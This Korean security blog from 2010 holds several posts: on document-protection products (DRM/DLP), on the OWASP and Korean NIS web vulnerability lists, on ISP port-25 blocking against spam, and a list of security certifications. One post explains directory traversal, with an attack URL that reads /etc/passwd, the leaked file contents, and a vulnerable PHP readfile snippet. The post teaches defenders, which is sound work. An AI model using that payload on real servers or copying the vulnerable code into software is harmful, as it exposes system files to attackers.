IT정보&보안뉴스2010/04/30 14:45

 1. PC문서보안 솔루션

       (1) DRM : Data가 외부로 나갈 경우 암호화, 워터마킹등 (파수닷컴, 마크애니)

       (2) DLP : Data가 외부로 나갈 경우 암호화, 워터마킹, 모니터링등 (워터월)

       (3) SBC : Data를 모두 서버에 저장 (국내에서 인기를 얻지 못하고 있음)  


더보기


 

Posted by H@CK
TAG DLP, DRM, SBC, 디지털 저작권 관리
Trackback 0 Comment 0
IT정보&보안뉴스2010/04/29 20:38

웹 브라우저에서 확인 가능한 경로의 상위로 올라가서 특정 시스템 파일을 다운로드하는 공격 

무료 공개된 쇼핑몰 사이트 소스 중에 Directory Traversal 문제 발견!!

정상 URL
http://www.example.com/shop.php?html=product

이 URL을 보면 알 수 있듯이 html이라는 변수에 product이라는 값이 들어오면 그 값에 해당하는 웹 페이지(여기서는 제품 소개)를 화면에 출력하는 구조라는 것을 짐작할 수 있다. 실제 브라우저로 확인해 보면 더 잘 알 수 있다.

이런 구조는 입력한 파라미터가 다음 화면에 출력되는 것은 아니기 때문에 XSS(Cross-site Scripting) 문제가 발생할 확률은 적지만, 이렇게 변수가 파일을 호출하는 구조는 주의를 기울여야 한다.

따라서 다음과 같이 공격을 실시하였다.

http://www.example.com/shop.php?html=product../../../../../../../etc/passwd%00

결과는 다음과 같이 레스폰스 소스에 웹 서버에 존재하는 /etc/passwd파일의 내용이 표시되었다.


<title></title>
<meta http-equiv="Content-Type" content="text/html; charset=euc-kr">
...중략...
</tr>
<tr>
<td height="2"></td>
</tr>
</table>
</td>
</tr>
</table></td>
<td width="5"> </td>
</tr>
</table></td>
</tr>
<tr>
</table>
</div>
</div>

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
gdm:x:42:42::/var/gdm:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash


</td>
</tr>
</table>
<table width="884" border="0" align="center" cellpadding="0" cellspacing="0">
</tr>
</table></td>
</tr>
<tr>
<td> </td>
</tr>
</table></td>
</tr>
</table></body>
</html>


전형적인 취약한 코드(php)
다음과 같이 GET변수에 data_file로 지정된 파일을 표시하는 구조가 대표적인 취약한 예이다.

<?php
    readfile( '/home/html/data/' . $_GET['data_file'] );
?>

참고: 위 공격 URL 맨 뒤에 붙인 %00은 널바이트로서 뒤에 확장자가 붙는 경우에는 이 널바이트를 사용하여 확장자를 무시하게 된다.

체크 포인트(php)
제어구조: include, include_once, require, require_once
함수: fopen(), file(), copy(), unlink() 와 같은 파일 시스템류
        system(), exec(), passthru() 와 같은 프로그램 실행류

우려되는 피해
상정하지 않은 파일의 열람, 삭제, 변경(파일시스템 함수나 include, require문)이 가능
시스템 커맨드의 실행이 가능(프로그램 실행 함수)

[출처] http://misman95.egloos.com/1588057

Posted by H@CK
Trackback 0 Comment 0
IT정보&보안뉴스2010/04/29 18:58

최근 웹 애플리케이션 공격이 급증하면서 웹 방화벽과 웹 취약점에 대한 관심이 커지고 있습니다.
OWASP 10 대 위협과 국정원 8대 취약성을 인지하고 있다면,  웹 방화벽이나 취약점분석 서비스를 선택하는데에 도움이 될 것이라 생각됩니다.


- OWASP 10대 위협!!


1. 입력값 검증 부재
  웹 애플리케이션 서비스를 요청하기 위해 애플리케이션에 데이터를 전송할 때 HTTP를 통해 URL, 쿼리(Query), 헤더(Header), 쿠키(Cookie), HTML 폼에 대한 정보를 전송한다. 이때 이 데이터 값을 악의적으로 변경해 시스템에 피해를 가할 수 있다.


2. 취약한 접근 통제
  가장 심각한 위협은 외부에서 관리자의 접근을 허용하는 것으로 루트 권한이나, 시스템 환경 구성 관리 권한을 제공하면 이 통로를 통해 전 시스템에 대한 접근이 허용될 수 있다.


3. 취약한 인증 및 세션 관리
  인증 관련 정보를 제어하는 프로그램에 대한 통제는 상대적으로 느슨하다. 세센에 실려 다니는 정보가 유츌되 위협이 발생할 수도 있다.


4. 크로스 사이트 스크립트
  특정 사이트에서 사용자가 정보를 받을 때 그 정보 내에 악의적인 코드를 숨겨놓아 이를 클라이언트에서 실행되도록 하는 기법이다.


5. 버퍼 오버플로우
  웹 서버, 웹 애플리케이션 서버에 대한 공격 유형이다. 웹 애플리케이션 자체의 버퍼 오버플로우에 대한 공격 유형과 비슷하다.


6. 삽입 취약점
  삽입 취약점은 웹 애플리케이션이 자체 로직을 이용해 외부의 모듈을 호출하는 것이다.


7. 부적절한 에러처리
  애플리케이션 실행 도중 에러가 발생한 경우에 해당 에러의 내용을 직접 사용자 화면에 보여주는 경우가 있다. 이 정보가 자바 익스프레션 덤프(Exception Dump)라면 사용자는 애플리케이션이 어떤 계층 구조로 이뤄져 있고 어디에서 어떤 문제가 발생하는지 알 수 있으며 이를 통해 시스템에 대한 공격을 할 수 있다.


8. 취약한 정보저장 방식
  웹 애플리케이션이 데이터베이스나 파일 시스템이 민감한 정보를 저장할 필요가 있다. 이들 정보는 외부에서 접근이 허용되지 않는 내부 망에 저장되는 경우가 대부분이지만 웹 서버에 저장돼 외부 취약점이 발생하기도 한다.


9. 서비스 방해공격
서비스 방해 공격은 웹 애플리케이션의 취약점을 이용해 해당 애플리케이션이 서비스 중단 상태로 가도록 하는 것이다.


10. 부적절한 환경 설정
 서버 환경 설정에서 일반적으로 일어나는 유형은 운영팀에서 적절한 보안 패치를 하지 않았을때 발생한다.


- 국정원 8대 홈페이지 취약성


2005년 국가사이버안전센터(NCSC)에서 국내 각 기관에서 홈페이지 해킹에 많이 악용되었던 보안취약점 8종을 선정하고 발표하였다.


1. 디렉토리 리스팅 취약점

홈페이지의 속성을 설정하는 “웹사이트 등록정보”에 특정 디렉토리에 대하여
- IIS 웹 서버 : ‘디렉토리 검색’ 항목이 체크
- Apache 웹 서버 :  ‘httpd.conf 파일’에서 ‘Indexes’옵션이 On
되어 있는 경우에 인터넷 사용자에게 모든 디렉토리 및 파일 목록이 보여지게 되고, 파일의 열람 및 저장도 가능하게 되어 비공개 자료가 유출될 수 있다.


2. 파일 다운로드 취약점
게시판 등에 저장된 자료에 대해 ‘다운로드 스크립트’를 이용하여 다운로드 기능을 제공하면서, 대상 자료파일의 위치 지정에 제한조건을 부여하지 않았을 경우에 URL칸의 다운로드 스크립트의 인수 값에 ‘../’문자열 등을 입력하여 시스템 디렉토리 등에 있는 /etc/passwd와 같은 비공개 자료들이 유출될 수 있다.


3. 크로스사이트 스크립트 취약점
게시판에 새 게시물을 작성하여 등록할 때와 같이 사용자의 입력을 받아 처리하는 웹 응용프로그램에서 입력 내용에 대해 실행코드인 스크립트의 태그를 적절히 필터링하지 않을 경우에 악의적인 스크립트가 포함된 게시물을 등록할 수 있어 해당 게시물을 열람하는 일반 사용자의 pc로 부터 개인정보인 쿠키를 유출할 수 있는 등의 피해를 초래할 수 있다.


4. 파일 업로드 취약점
첨부파일 업로드를 허용하는 홈페이지 게시판에서 .php, .jsp등의 확장자 이름의 스크립트 파일의 업로드를 허용할 경우에 해커가 악성 실행 프로그램을 업로드한 후에 홈페이지 접속방식으로 원격에서 서버컴퓨터의 시스템 운영 명령어를 실행 시킬 수 있다. 
 

5.WebDAV 취약점- 원격 실행
윈도우 서버 컴퓨터에서 기본으로 설치되는 원격관리기능인 WebDAV가 계속 사용 가능하도록 설정되어 있고, WebDAV 라이브러리 파일의 속성 및 홈페이지 디렉토리에 쓰기 권한이 모두 허용되어 있는 경우에 해커가 WevDAV도구를 사용, 원격에서 홈페이지 디렉토리에 임으로 파일을 삽입하여 화면을 변조할 수 있다.

6. 테크노트(Technote) 취약점
‘테크노트’의 일부 CGI프로그램들에서 인수 값 처리시에 ‘ㅣ’문자 이후에 나오는 컴퓨터 운영 명령어가 실행될 수 있는 결함이 있어 해커는 홈페이지접속 방식으로 컴퓨터 명령어를 실행하여 화면을 변조하거나 컴퓨터를 조작할 수 있다.
- Linux 및 Unix계열의 컴퓨터에 주로 사용
- Windows 계열에서 ‘Perl’이 지원될 경우 사용

7. 제로보드(Zeroboard) 취약점
- ‘제로보드’의 일부 php프로그램이 원격에 있는 php파일을 실행할 수 있는 결함이 있어 해커는 홈페이지 접속 방식으로 컴퓨터 명령어를 실행하여 화면을 변조하거나 컴퓨터를 조작할 수 있다.
- Linux 및 Unix 계열의 컴퓨터에 주로 사용
- Windows 계열에서 ‘php’가 지원될 경우 사용

8. SQL Injection 취약점
웹 브라우저 주소 창 또는 사용자 ID 및 패스워드 입력화면에서 데이터베이스 SQL문에 사용되는 문자기호(‘ 및”)의 입력을 적절히 필터링 하지 않은 경우에 해커가 SQL 문으로 해석될 수 있도록 조작한 입력으로
데이터베이스를 인증 절차 없이 접근, 자료를 무단 유출하거나 변조할 수 있다. 

Posted by H@CK
Trackback 0 Comment 0
Mail/Spamsniper2010/04/06 15:35
방송통신위원회/KISA에서 올해 들어 드디어 추진하기 시작한 정책 중 ISP의 25번 포트 차단이 있습니다. 25번 포트는 아웃룩 등의 MUA(메일 유저에이전트/메일 클라이언트 소프트웨어) - SMTP 서버간 접속시(Message Submission), 서버간 메일 전송시(Message Transmission) 사용되는 포트로, 현재 한국내 대부분의 ISP에서는 오픈되어있습니다. 이를 막겠다는 겁니다.

"어, 그러면 메시지 트랜스미션 때도 막히지 않나요. 집에서 아웃룩 쓰지 말라는 얘긴가요" 라고 반문하실 수도 있지만, ISP에서 25번 포트를 차단한다는 것은 메시지 서브미션 단계를 차단한다는 것을 뜻합니다. 즉, 메시지 서브미션을 다른 포트를 통해 진행할 수 있다면 집 PC에서 아웃룩 등을 이용하여 메일을 전송하는 것은 전혀 지장이 없습니다.

실제로 일본내 대부분의 ISP에서는 가정 회선에서 25번 포트가 차단되어있습니다. 한국내에서도 메일 서비스 업체(ESP)를 중심으로 25번 포트 차단에 대한 요구는 끊임없이 있어왔습니다만, 거의 5년만에 본격 추진하는 셈이 됩니다.

25번 포트 차단의 가장 큰 목적은 스팸메일의 감소요, 좀 더 미시적으로 본다면 좀비PC로 인한 폐해를 줄이는데 그 목적이 있습니다. 웜 등의 정크웨어에 감염된 PC에서는 사용자가 모르는새 SMTP 데몬이 기동하여 그 자신을 다른 곳에 전파하고 있는데, 기본적으로 열려있는 25번 포트를 통해 메시지 트랜스미션을 진행하고 있습니다(좀비PC 자체가 하나의 SMTP 서버로 작동하므로 메시지 서브미션 단계 없이 받는 쪽 메일 서버에 바로 붙습니다).

만약 25번 포트가 차단된다면 웜 등의 정크웨어 스스로 발송을 시도하는 메일 자체가 전송이 되지 않습니다. 게이트웨이 단에서 25번 포트를 차단하기 때문에 불필요한 정크 트래픽을 감소시키는 효과도 기대할 수 있습니다. 웜이 다른 포트를 통해 전송을 시도한다 하더라도 어차피 서버간 통신에서는 25번 외에 다른 포트를 통해 들어오는 트랜스미션을 무시하면 그만입니다. 그래서 그간 ESP에서 줄기차게 25번 포트 차단을 요청했는데, 앞서 말한대로 거의 5년만에 구체적으로 진행이 시작된 거고, 그 5년간 좀비PC로 인한 문제는 줄어들 일이 없었죠. 쩝.

현재도 ESP에서는 ISP의 가정용 유동 IP 대역에서 25번 포트를 통해 직접 발송되는 메시지 트랜스미션을 무시하면 좀비PC로부터 전송되는 정크 메일은 안 받을 수 있습니다만, ISP는 ESP에게 어떤 IP 대역이 어떤 용도로 사용되는지 알려주지 않습니다(IPWHOIS 결과가 점점 빈약해지는 것을 보면 ISP가 할당 정보를 가급적 공개하지 않는 쪽으로 간다는 것을 알 수 있습니다). 그렇다고 ESP에서 멋대로 추측할 수도 없고(할당 정보는 수시로 변동되니..), 25번 포트를 통한 모든 메시지 트랜스미션을 막자니 서버간 통신시에 25번 포트를 사용해야하기 때문에 그럴 수도 없습니다.

따라서 이번 정책은 ISP에서 움직이는 것이 주(主)가 됩니다. 이 상태에서 ESP는 아무것도 안하고 놀면 되느냐, 그건 아니지요. ISP에서 25번 포트를 막기 때문에, 사용자들의 SMTP 접속을 보장하기 위해(메시지 서브미션을 위해) 25번 외에 다른 포트를 제공해야하고, 보통 587번 포트를 사용합니다. SMTP에 SSL을 지원하여 SMTP over SSL 환경이 가능하다면 465번 포트를 사용할 수도 있습니다.

현재 ESP 중에서 Gmail(587), 한메일(465), 드림위즈(유료·25/587/465) 정도가 25번 차단시 ESP에서의 별다른 추가 작업없이 바로 이용할 수 있고, 네이버나 대부분의 호스팅 서비스처럼 25번만 제공하는 경우 비싼 SSL 인증서를 설치한 뒤 465번을 제공하던지, 587번을 제공하던지 해야 사용자들에게 불편함이 없습니다(물론 대부분의 메일 클라이언트 기본값이 25번으로 입력되어있기 때문에 이 부분에 대한 설정 변경 안내를 해줘야 합니다).  

방통위/KISA에서 추진한다고 해서 당장 2월부터 시행되고 이런 것은 아닙니다만, 기존의 25번 포트를 제공하면서 587번 포트의 추가 제공 등은 미리 작업해서 손해볼 일은 없으니, 미지원 업체들의 빠른 대응이 필요할 듯 합니다. ⓣ

[출처] http://widelake.net/446
Posted by H@CK
Trackback 0 Comment 0
자격증정보2010/04/03 13:23

 LPT (Licensed Penetration Tester) 
- 모의 침투 테스트 면허증

 

 CEI (Certified EC-Council Instructor)

-  윤리적 해커 양성 국제 공인 강사

 

 CHFI (Computer Hacking Forensic Investigator)

- 컴퓨터 해킹 포렌식 수사관

 

 ECSA (EC-Council Certified Security Analyst)

- 컴퓨터 보안 분석가

 

 CEH (Certified Ethical Hacker)

- 윤리적 해커 자격증

 

 Planet3 Wireless
 - CWNA (Certified Wireless Network Administrator)
 - CWSP (Certified Wireless Security Professional)

 

Juniper Networks
 - JNCIA-WX (Juniper Network Certified Internet Associate-WX)
 - JNCIA-DX (Juniper Network Certified Internet Associate-DX) 
     
F5 Networks
 - F5 SE-LTM (F5 Certified System Engineer)
 - F5 PC-LTM (F5 Certified Product Consultant)

 

Foundry Networks
 - FNCL4-7E (Foundry Networks Certified Layer 4-7 Engineer)

 

Nortel Network
 - NCSS (Nortel Networks Certified Support Specialist-Alteon)

 

ISC2
 - CISSP (Certified Information System Security Profreesioal)
   
ISACA
 - CISA (Certified Information Systems Auditor)
      
PMI
 - PMP (Project Management Professional )
       
CISCO
 - CCIE (Cisco Certified Internetwork Expert) R&S Written
 - CCNP (Cisco Certified Network Professional)
 - CCDP (Cisco Certified Design Professional)
 - CCDA (Cisco Certified Design Associate)
 - CCNA (Cisco Certified Network Associate)
  
SUN Microsystems
 - SCSECA (Sun Certified Security Administrator)
 - SCNA (Sun Certified Network Administrator)
 - CSA (Certified Solaris Administrator)

 

Microsoft
 - MCSE (Microsoft Certified System Engineer)
 - MCP+I (Microsoft Certified Professional+Ineternet)
 - MCP (Microsoft Certified Professional)

[출처] http://www.ceh.co.kr/

Posted by H@CK
Trackback 0 Comment 0